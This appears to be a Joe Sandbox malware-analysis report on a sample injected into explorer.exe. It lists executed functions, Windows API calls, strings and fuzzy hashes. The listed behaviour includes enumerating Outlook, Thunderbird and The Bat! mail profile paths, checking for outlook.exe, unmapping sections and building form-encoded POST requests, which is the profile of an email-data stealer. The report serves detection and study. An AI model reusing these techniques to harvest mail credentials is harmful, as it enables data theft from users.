lstrlenW.KERNEL32(02DB6564,?,?,02D62F0C), ref: 02D61978
lstrcatW.KERNEL32(00000000,?,?,?,02D62F0C), ref: 02D61990
lstrcatW.KERNEL32(00000000,02DB6564,?,?,02D62F0C), ref: 02D61994

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: 14b7473891bd061b7663e467858cc98161c6470c1520ebc87da4277071482fa3
Instruction ID: 814a10de818a30ab112b93468eae0bea0b8006ce9ea60f05e5f66ef98f65000c
Opcode Fuzzy Hash: 14b7473891bd061b7663e467858cc98161c6470c1520ebc87da4277071482fa3
Instruction Fuzzy Hash: 24E02B6270021C5B471076AE5CD4E7B779CCEC85A1719003AFA08D3301FE52DC0486F0

Function 02D8F21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 02D66A81: memset.NTDLL ref: 02D66A9C

_aulldiv.NTDLL(?,00000000,?,00000000), ref: 02D8F2A1

Strings

%llu, xrefs: 02D8F25E
%llu, xrefs: 02D8F2A8

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: _aulldivmemset
String ID: %llu$%llu
API String ID: 714058258-4283164361
Opcode ID: 582cecea707c541428091e3b000256e8b214c3dfb874aacfafcdf9050f751ef9
Instruction ID: 216a99d4745e1eb325c906d34fc18b86c7f864950f089183eca4bbf06205ce29
Opcode Fuzzy Hash: 582cecea707c541428091e3b000256e8b214c3dfb874aacfafcdf9050f751ef9
Instruction Fuzzy Hash: 0621F272A402456FD610BB24CC51FBAB75AEF81730F048628F922977C0DB21DC158AF1

Function 02D7203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,?), ref: 02D72174
_allmul.NTDLL(?,?,?,00000000), ref: 02D7220E
_allmul.NTDLL(?,00000000,00000000,?), ref: 02D72241
_allmul.NTDLL(02D62E26,00000000,?,?), ref: 02D72295

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: _allmul
String ID:
API String ID: 4029198491-0
Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction ID: 638eba7e10d7be720b31dd2429cf5a95611f8b17810d1a26eec62a1525d1d9e2
Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction Fuzzy Hash: DDA158706087819FD714EF65C894A2EB7E6EF98704F00492DFA9587350EB78EC45CB52

Function 02D778B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?), ref: 02D77979
memset.NTDLL ref: 02D7798A
memcpy.NTDLL(?,?,?), ref: 02D77A00
memset.NTDLL ref: 02D77A14

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: 6505dd05789061f476bfd78ef2416da4926c5d939c42491e641ff5f2d62d01e7
Instruction ID: d71c549234d88c95626e14842276930a2a410386783a89b61f1c5c3e6710c92b
Opcode Fuzzy Hash: 6505dd05789061f476bfd78ef2416da4926c5d939c42491e641ff5f2d62d01e7
Instruction Fuzzy Hash: 598147716093149FE350DF28C884A2ABBE6EF88604F444D6DF88A97351E778ED05CB92

Function 02D6190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,00000000,02D62783), ref: 02D6192B
lstrlen.KERNEL32(00000000,?,?,?,00000000,02D62783), ref: 02D61930
lstrcat.KERNEL32(00000000,?), ref: 02D61946
lstrcat.KERNEL32(00000000,00000000), ref: 02D6194A

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: 79813ca656f8dbe6e674b3c713d573a3de188d0cb175b922a71870b34cd405fa
Instruction ID: e0be5b73bb6fb2ba4877a9e3bb1882211b134faa0bec7a13509b5fe49dce3db7
Opcode Fuzzy Hash: 79813ca656f8dbe6e674b3c713d573a3de188d0cb175b922a71870b34cd405fa
Instruction Fuzzy Hash: A6E09B9270421C5B472176AE5C98E7B77DDCFC95A53190036F909D3301EE55DC0186F0

Analysis Process: explorer.exePID: 796, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	21.6%
Dynamic/Decrypted Code Coverage:	87.3%
Signature Coverage:	0%
Total number of Nodes:	181
Total number of Limit Nodes:	17

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 001E30A8 Relevance: 4.7, APIs: 3, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 001E3104
FindNextFileW.KERNELBASE ref: 001E3218
FindClose.KERNELBASE ref: 001E3229

Memory Dump Source

Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
Instruction ID: 7e47975b61a7cdd1c0013ac771e2757fdb7d3f2fdfc493a2b86083234fd29001
Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
Instruction Fuzzy Hash: 2F418030718F8D5FDB94EB3A84587AE73D6FBE8340F444A29A45AC3151EF78D9048781

Function 001E38B0 Relevance: 1.5, APIs: 1, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 001E38F2

Memory Dump Source

Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
Instruction ID: 097cb51da8669ee2c2db714b2f796e990a5433aa2dc2a752fd1d42f68c8a3b9f
Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
Instruction Fuzzy Hash: 1EF0A720F11D481BEA6C77BE645D33C2280E768314F900629B525C32D2DE398E458302

Function 001E2774 Relevance: 6.1, APIs: 4, Instructions: 124
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE ref: 001E27C7
RegQueryValueExW.KERNELBASE ref: 001E27F4
RegQueryValueExW.KERNELBASE ref: 001E283A
RegCloseKey.KERNELBASE ref: 001E2860

Part of subcall function 001E1860: RtlFreeHeap.NTDLL ref: 001E1880

Memory Dump Source

Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd

Similarity

API ID: QueryValue$CloseFreeHeapOpen
String ID:
API String ID: 1641618270-0
Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
Instruction ID: ccf7bf041aebf3b63dcfbc5c72128ed16b3404c9f41d604935d90650377ff595
Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
Instruction Fuzzy Hash: 4F319430608F888FE768DB29D458B7E77D4FBA8355F54062EE48BC2264DF34C8458742

Function 001E372C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE ref: 001E37B2
RegCloseKey.KERNELBASE ref: 001E37C1

Strings

?, xrefs: 001E37A2

Memory Dump Source

Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd

Similarity

API ID: CloseCreate
String ID: ?
API String ID: 2932200918-1684325040
Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
Instruction ID: f089e2d98142ede5eb315fd1690139ebe127f6ba6b762c6ccf46c37e5fa554f9
Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
Instruction Fuzzy Hash: C7116070618B488FD751DF69D48C66EB7E1FB98345F50062EE48AC3260DF389985CB82

Function 001EA298 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 001EA397
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 001EA441
VirtualProtect.KERNELBASE ref: 001EA45F

Memory Dump Source

Source File: 00000012.00000002.2390934990.00000000001E9000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e9000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction ID: 9ec2f8ce0216b8ce876207e465434105fb62cdccd59290ba9fec98635038bf8e
Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction Fuzzy Hash: D4517B31358D9E4BCB24AB799CC42FDB7C1FF55321B98062AD09AC3285D759E8468383

Function 001E3254 Relevance: 4.7, APIs: 3, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001E298C: GetFileAttributesW.KERNELBASE ref: 001E299E

GetPrivateProfileSectionNamesW.KERNEL32 ref: 001E330F
GetPrivateProfileStringW.KERNEL32 ref: 001E336F
GetPrivateProfileIntW.KERNEL32 ref: 001E338C

Part of subcall function 001E30A8: FindFirstFileW.KERNELBASE ref: 001E3104

Part of subcall function 001E1860: RtlFreeHeap.NTDLL ref: 001E1880

Memory Dump Source

Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd

Similarity

API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
String ID:
API String ID: 970345848-0
Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
Instruction ID: 7311922a059f97f7a4b3431bbe8e4cd9b284c5daf37c2bb3fe16d7037008dca9
Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
Instruction Fuzzy Hash: CA51C830718F494BDB1DBB2E981AA7D72D2FBA8700B44056DE41AC3296EF74DD428786

Function 001E3458 Relevance: 4.7, APIs: 3, Instructions: 172
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE ref: 001E347E
RegOpenKeyExW.KERNELBASE ref: 001E353F
RegEnumKeyExW.KERNELBASE ref: 001E35D6

Part of subcall function 001E2774: RegOpenKeyExW.KERNELBASE ref: 001E27C7
Part of subcall function 001E2774: RegQueryValueExW.KERNELBASE ref: 001E27F4
Part of subcall function 001E2774: RegQueryValueExW.KERNELBASE ref: 001E283A
Part of subcall function 001E2774: RegCloseKey.KERNELBASE ref: 001E2860

Part of subcall function 001E3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 001E330F

Part of subcall function 001E1860: RtlFreeHeap.NTDLL ref: 001E1880

Memory Dump Source

Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd

Similarity

API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
String ID:
API String ID: 1841478724-0
Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
Instruction ID: 563a5e5acd0395f07f9f49efccd7507d184cd1d12abf12055bbe3dcb3c317550
Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
Instruction Fuzzy Hash: B6414C30718F884FDB98EF6E945972EB6E2FBA8341F00456EA54EC3261DF34D9448742

Function 001E2938 Relevance: 3.0, APIs: 2, Instructions: 34
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 001E2966
CloseHandle.KERNELBASE ref: 001E297A

Memory Dump Source

Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
Instruction ID: 0782f6848884301e6f3135cb8e30d9a03e81f8059faf96c5c6db465300b886d6
Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
Instruction Fuzzy Hash: 79F0E570215B5A8FE7486FBA44A833AF6D4FB08319F18563DE45AC22D0DBB488428702

Function 001E22B4 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE ref: 001E22D0

Memory Dump Source

Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction ID: e36a36fabed1c78a5d0f2300c896c03cee840663c113124d103ceaa8d6268cba
Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction Fuzzy Hash: B3E0C230108B0A8FD758AFBDE4CA07933A1FB9C252B05053FE005CB114D27988C1C741

Function 001E298C Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE ref: 001E299E

Memory Dump Source

Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
Instruction ID: 6664e7b65eec73d1dff12e81d190144499bac52ed11817e51c0ec2b9aa29e084
Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
Instruction Fuzzy Hash: 5FD0A522711D95077B5425F708FD1793058D71931DF541335D937C11E1D3A5CCD59205

Function 001E1860 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL ref: 001E1880

Memory Dump Source

Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
Instruction ID: 81ccf7552b99934a6a44b0d0945b6b8b217d0a13740ae8bcd668d91e151af865
Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
Instruction Fuzzy Hash: A3D01234716E441BEF2CBBFB2C8D178BAD2E7A8216B588065B819C3251DE39C895C342

Analysis Process: explorer.exePID: 7052, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	14.4%
Dynamic/Decrypted Code Coverage:	96.2%
Signature Coverage:	0%
Total number of Nodes:	211
Total number of Limit Nodes:	2

Executed Functions

Function 0066255C Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006629B7: GetProcessHeap.KERNEL32(00000008,00000412,0066257A,006618F4), ref: 006629BA
Part of subcall function 006629B7: RtlAllocateHeap.NTDLL(00000000), ref: 006629C1

lstrcatW.KERNEL32(00000000,?,006618F4), ref: 00662588
PathAppendW.SHLWAPI(00000000,*.*,?,006618F4), ref: 00662594
FindFirstFileW.KERNELBASE(00000000,?,?,006618F4), ref: 006625A8
RtlZeroMemory.NTDLL(00000209,00000209), ref: 006625C3
lstrcatW.KERNEL32(00000209,?,?,006618F4), ref: 006625E1
PathAppendW.SHLWAPI(00000209,?,?,006618F4), ref: 006625ED
lstrcatW.KERNEL32(00000209,?,?,006618F4), ref: 00662611
PathAppendW.SHLWAPI(00000209,?,?,006618F4), ref: 0066261D
StrStrIW.SHLWAPI(00000209,?,?,006618F4), ref: 0066262C
FindNextFileW.KERNELBASE(00000000,?,?,006618F4), ref: 00662644
FindClose.KERNELBASE(00000000,?,006618F4), ref: 00662653

Strings

*.*, xrefs: 0066258E

Memory Dump Source

Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_661000_explorer.jbxd

Similarity

API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
String ID: *.*
API String ID: 1648349226-438819550
Opcode ID: 39361bbe3d48990607cb6858fa0ff7e9e8c36c1c3e0f5366ff50c29c4f7b1d5a
Instruction ID: 0fd88c8b4846a12a305990d02913b9a2d2369e7bc1f060710a4e6fc2a6539a89
Opcode Fuzzy Hash: 39361bbe3d48990607cb6858fa0ff7e9e8c36c1c3e0f5366ff50c29c4f7b1d5a
Instruction Fuzzy Hash: DA219171204616AFD710AF20DD58DAFBBAEFF95701F00151CF951E2352DB748E0A87A6

Function 00661016 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006627E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00662664,?,006618F4), ref: 006627EF

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0066103A
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00661043

Strings

Hqx, xrefs: 00661035

Memory Dump Source

Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_661000_explorer.jbxd

Similarity

API ID: MemoryMoveQuerySectionUnmapViewVirtual
String ID: Hqx
API String ID: 1675517319-3912414419
Opcode ID: be3ea2dcd6addecc920ef433a0bc2a6a4954db110b6cf12b4e1c454ac82cfd80
Instruction ID: fe33f55931352a4aa0b0bbb780709be1062052dd732ac0b6e621f571889a8d5a
Opcode Fuzzy Hash: be3ea2dcd6addecc920ef433a0bc2a6a4954db110b6cf12b4e1c454ac82cfd80
Instruction Fuzzy Hash: B4D05E31800261B7CFA47774BC1A9CA2A4F9F56330B285219F5659A2D2CDB54A8483B4

Function 0066104F Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006629B7: GetProcessHeap.KERNEL32(00000008,00000412,0066257A,006618F4), ref: 006629BA
Part of subcall function 006629B7: RtlAllocateHeap.NTDLL(00000000), ref: 006629C1

ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 0066107F
ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 00661093
ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 006610A7
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000,?,?,?,0066104E,?,00661010), ref: 006610BB
ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 006610D3
ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 006610E7
ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 006610FB
ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 0066110F
ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 00661123
wsprintfA.USER32 ref: 0066116B
ExitProcess.KERNEL32 ref: 00661189

Strings

%APPDATA%\The Bat!, xrefs: 006610E2
%APPDATA%\Thunderbird, xrefs: 006610CE
%ALLUSERSPROFILE%\The Bat!, xrefs: 006610F6
%ALLUSERSPROFILE%\BatMail, xrefs: 0066111E
%s,, xrefs: 00661165
%APPDATA%\BatMail, xrefs: 0066110A
%APPDATA%\Microsoft\Outlook, xrefs: 0066107A
%ALLUSERSPROFILE%\Microsoft\Outlook, xrefs: 006610A2
%LOCALAPPDATA%\Microsoft\Outlook, xrefs: 0066108E

Memory Dump Source

Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_661000_explorer.jbxd

Similarity

API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
API String ID: 1709485025-1688604020
Opcode ID: 4b8be8a2b21f62c91d9dd32fa4bf7c3aa6799a4201191e90c1ea41de7b0160fd
Instruction ID: 680055fe201df836566f273ccf35f3f3d9b25ad11394339721b074a44d79cbed
Opcode Fuzzy Hash: 4b8be8a2b21f62c91d9dd32fa4bf7c3aa6799a4201191e90c1ea41de7b0160fd
Instruction Fuzzy Hash: E3318D517402667BEB6133668C26FBF594F9F83B94B090128FA05EE3C2DE558E0186F9

Function 0066274A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00662758
Process32First.KERNEL32(00000000,?), ref: 00662777
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0066278B
Process32Next.KERNEL32(00000000,00000128), ref: 006627A8
CloseHandle.KERNELBASE(00000000), ref: 006627B3

Strings

outlook.exe, xrefs: 0066277F

Memory Dump Source

Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_661000_explorer.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
String ID: outlook.exe
API String ID: 868014591-749849299
Opcode ID: 9977786e2a0ded1f7ad64a5217b79d401fa231e9490a4e7cfc8b023f056ee138
Instruction ID: 73169951fa4440d8aa34cbc987b115953d02cf2503935340456723ea9020c6b2
Opcode Fuzzy Hash: 9977786e2a0ded1f7ad64a5217b79d401fa231e9490a4e7cfc8b023f056ee138
Instruction Fuzzy Hash: 6FF09630901539EBD720AB74DC49FEA7B7EDB19721F000190E849E2391DB749F9D4A91

Function 00669CF6 Relevance: 3.3, APIs: 2, Instructions: 282
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000013.00000002.2396956156.0000000000668000.00000040.80000000.00040000.00000000.sdmp, Offset: 00668000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_668000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bf3e10bcdb0ce4becbc58a95c86dc048c44c40681fc49bf0e49dd48e0d385cf
Instruction ID: f3a2a1c5b3b803782a9b25796426ddb797245ba676885a3a59c54a6d0d01e423
Opcode Fuzzy Hash: 2bf3e10bcdb0ce4becbc58a95c86dc048c44c40681fc49bf0e49dd48e0d385cf
Instruction Fuzzy Hash: F19148725097914FD7169E74CC806E5BBAAEF52320B2C06B9CCD1CB386E775580AC7B0

Function 006629B7 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000412,0066257A,006618F4), ref: 006629BA
RtlAllocateHeap.NTDLL(00000000), ref: 006629C1

Memory Dump Source

Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_661000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 07ef76f5cf470c0407764c26d72dccce96ab9e8ad3216726b3faa302a424fc6d
Instruction ID: fc1d4625db7cefe8e4801a9063dbb292b2e3877df830ed3be41c5f9ad6b19290
Opcode Fuzzy Hash: 07ef76f5cf470c0407764c26d72dccce96ab9e8ad3216726b3faa302a424fc6d
Instruction Fuzzy Hash: 7AA002B15502107BDF4457B5AE1DA157539A745701F005544F3458515499E455488721

Non-executed Functions

Function 006620A7 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006629B7: GetProcessHeap.KERNEL32(00000008,00000412,0066257A,006618F4), ref: 006629BA
Part of subcall function 006629B7: RtlAllocateHeap.NTDLL(00000000), ref: 006629C1

Part of subcall function 00662938: lstrlen.KERNEL32(00787116,?,00000000,00000000,006620E3,74DE8A60,00787116,00000000), ref: 00662940
Part of subcall function 00662938: MultiByteToWideChar.KERNEL32(00000000,00000000,00787116,00000001,00000000,00000000), ref: 00662952

Part of subcall function 006624CC: RtlZeroMemory.NTDLL(?,00000018), ref: 006624DE

RtlZeroMemory.NTDLL(?,0000003C), ref: 0066213F
wsprintfW.USER32 ref: 00662278
wsprintfW.USER32 ref: 006622E3
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 006623AD

Strings

POST, xrefs: 00662229
Accept: */*Referer: %S, xrefs: 0066226E
Hqx, xrefs: 006620F3, 006621EA
Content-Type: application/x-www-form-urlencoded, xrefs: 00662307
Host: %s, xrefs: 006622DD

Memory Dump Source

Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_661000_explorer.jbxd

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$Hqx$POST
API String ID: 4204651544-3472570425
Opcode ID: ebe1a1eb608a1172e824dc54255a4363b2c165d5f99a6a001e84cacd8c6e294f
Instruction ID: 4368d22048320f21580f456014ff57030b9d7c9163037f027f9f739d484d579a
Opcode Fuzzy Hash: ebe1a1eb608a1172e824dc54255a4363b2c165d5f99a6a001e84cacd8c6e294f
Instruction Fuzzy Hash: A6A19B71608752AFD310DF69D894A6BBBEAEF88340F04092DF985D7351DB74DE088B52

